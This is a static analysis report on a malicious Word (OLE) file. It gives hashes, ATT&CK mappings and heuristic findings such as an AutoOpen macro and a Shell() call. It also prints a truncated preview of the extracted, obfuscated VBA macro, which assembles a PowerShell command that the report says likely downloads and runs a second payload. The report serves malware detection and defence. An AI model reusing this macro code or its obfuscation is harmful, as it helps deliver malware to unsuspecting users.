Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 22a55c683ba57773…

MALICIOUS

Office (OLE)

Size: 104.8 KB
Created: 2018-06-25 10:57:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: fae842763c15dffac6043b1d463e3ea6
SHA-1: 5388ae5dcd2add6274eceb9538e133ec90c74f1d
SHA-256: 22a55c683ba57773961a7ef7275a2f0dae09575e7c67a9db659d9d092284c575
Risk score: 182

Malware Insights

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The critical heuristic 'OLE_VBA_SHELL' indicates a Shell() call within the VBA macros. This, combined with the 'OLE_VBA_AUTOOPEN' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' firings, strongly suggests the macro is designed to execute arbitrary commands. The script itself contains obfuscated string concatenations that appear to be assembling commands, likely for downloading and executing a secondary payload.

Heuristics (6)

  • VBA macros detected (medium; 3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA (critical) OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11352 bytes
SHA-256: c8a60216e5e412f0f40cdda647131b4391b702832bb5c56b8c5be477d2c297c4

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "wTRwNsl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "tikYaVkZ"
Function iZqojCjnNF()
On Error Resume Next
MOsCvZ = (63109 / CBool(76716) + 20216 + CSng(imlYGt) * (87404 - kBGVi + 94117 - CLng(bwzEz)))
rLYEr = CByte(60013 * Tan(72484) / 48449 + CLng(soXcw * 6909 * 34955 * Chr(42247)))
rGNpddXs = "He" + "ll " + "." + Chr(40) + " $sHe" + "LLId[1]" + Chr(43) + "$S" + "hEl" + "LiD[13]" + Chr(43)
LhTLHY = (83923 / CBool(61373) + 90824 + CSng(UdjjMi) * (82667 - MUPOHz + 67152 - CLng(SwGwI)))
aHsQu = CByte(62137 * Tan(7043) / 99848 + CLng(LjvEY * 18307 * 8898 * Chr(20020)))
sJqOkYF = "'X'" + Chr(41) + Chr(40) + " -JoI" + "N" + Chr(40) + " '" + "46M110i" + "93n127M" + "55" + "u10" + "0z111" + "y125y3" + "9n101B10"
HbFBaz = (49698 / CBool(38830) + 54408 + CSng(GtYwhL) * (5716 - rwnKYM + 13762 - CLng(iMuKz)))
nNrjD = CByte(46764 * Tan(62678) / 90685 + CLng(aEFtTm * 76166 * 25371 * Chr(87765)))
TmqDC = "4-" + "96i111" + "-105z12" + "6n42z" + "68z111" + "i126f" + "36-93i"
hNNFw = (7337 / CBool(86162) + 89932 + CSng(SNZRw) * (86223 - LEAHi + 90630 - CLng(GNGSTn)))
rzBpR = CByte(1166 * Tan(49648) / 14149 + CLng(dKdJcd * 1975 * 73722 * Chr(12028)))
iTWNJTUH = "111i" + "104n7" + "3n" + "102B99n1" + "11-100" + "z126f49B" + "46u12" + "0n103i7" + "5,55M4" + "5,"
NaiMl = (82096 / CBool(74368) + 32396 + CSng(splZG) * (10278 - NYchsj + 8232 - CLng(XwBlT)))
MUMSar = CByte(15599 * Tan(75580) / 29241 + CLng(ijSOFs * 71842 * 43504 * Chr(8137)))
OmshZnsqYdj = "98M126" + "n126" + "B12" + "2i48i3" + "7,37" + "u103n"
PcJYI = (64033 / CBool(42946) + 49458 + CSng(ppBzij) * (41238 - GjOTa + 17295 - CLng(CINpDf)))
ihSNj = CByte(20025 * Tan(76323) / 20482 + CLng(UizaId * 74055 * 76280 * Chr(66291)))
YXTWlbzhVwo = "111" + ",110y121" + "-105" + ",99" + ",1" + "11f1" + "00M10" + "5-111" + "B36y" + "127-10"
Tiqpip = (38156 / CBool(61661) + 43149 + CSng(TjWIdL) * (38048 - RwLkvn + 87551 - CLng(biUYVa)))
TMjor = CByte(69321 * Tan(46736) / 30099 + CLng(RKZnMq * 93438 * 95927 * Chr(19331)))
XucSiPwNbFQ = "0u99-" + "12" + "4f111" + "n120z36," + "97n98u" + "107f" + "120,97n" + "101" + "z124" + "u36f12" + "7u1"
WlZij = (5315 / CBool(93139) + 94857 + CSng(kLzdt) * (49526 - wwWcu + 86036 - CLng(jTkNFY)))
mWOODV = CByte(89369 * Tan(56423) / 95535 + CLng(umKiTT * 63545 * 62602 * Chr(27284)))
RuBmWNlvBk = "07" + "n37n99," + "103y1" + "07B109n" + "111y121," + "37" + "M122n98-" + "101u10"
uzbhM = (57477 / CBool(8719) + 85415 + CSng(wpqYd) * (97490 - jPpEHS + 98412 - CLng(hIiCNA)))
hrOqm = CByte(92006 * Tan(63303) / 3931 + CLng(QCNzw * 7882 * 26640 * Chr(64079)))
hRush = "5B" + "107i1" + "09M" + "107B10" + "2n" + "102f11" + "1,120" + "M115"
ikRqJB = (52716 / CBool(1084) + 80760 + CSng(EvCiP) * (88596 - zKmMs + 4549 - CLng(PnFEz)))
duAWiP = CByte(73504 * Tan(80973) / 64604 + CLng(PlFjz * 57969 * 28439 * Chr(44573)))
iANClDK = "f37" + "-56-62" + "n36f58M5" + "1u" + "36-59" + "f63M3" + "7M"
FoEDuT = (74149 / CBool(64960) + 8562 + CSng(WwWBBW) * (18763 - fwzHRR + 95757 - CLng(amVPl)))
iGtAY = CByte(82556 * Tan(12156) / 5120 + CLng(ihOLQs * 71033 * 8713 * Chr(19170)))
WRIQb = "126M1" + "20,1" + "00f3" + "6i111y1" + "14u1" + "11z" + "74n98M" + "12" + "6z1" + "26z122i" + "48B3" + "7y"
iZqojCjnNF = rGNpddXs + sJqOkYF + TmqDC + iTWNJTUH + OmshZnsqYdj + YXTWlbzhVwo + XucSiPwNbFQ + RuBmWNlvBk + hRush + iANClDK + WRIQb
jjazzW = (74638 / CBool(10980) + 44394 + CSng(AMppzN) * (31218 - BwSoc + 445 - CLng(aCGhf)))
hLbCpH = CByte(13275 * Tan(92650) / 57292 + CLng(ljIwVs * 49257 * 26474 * Chr(6149)))
End Function
Function CVSObtswfOO()
On Error Resume Next
dDLVvG = (51296 / CBool(65721) + 45516 + CSng(jYsES) * (1014 - nIFJK + 44755 - CLng(hFTEv)))
dsiCLi = CByte(99507 * Tan(11616) / 13174 + CLng(hYYKFM * 83028 * 8794 * Chr(57664)))
HQWmtnkkJ = "37" + "n121n11" + "1M12" + "0n1" + "11-1" + "00i99" + "u126i1
... (truncated)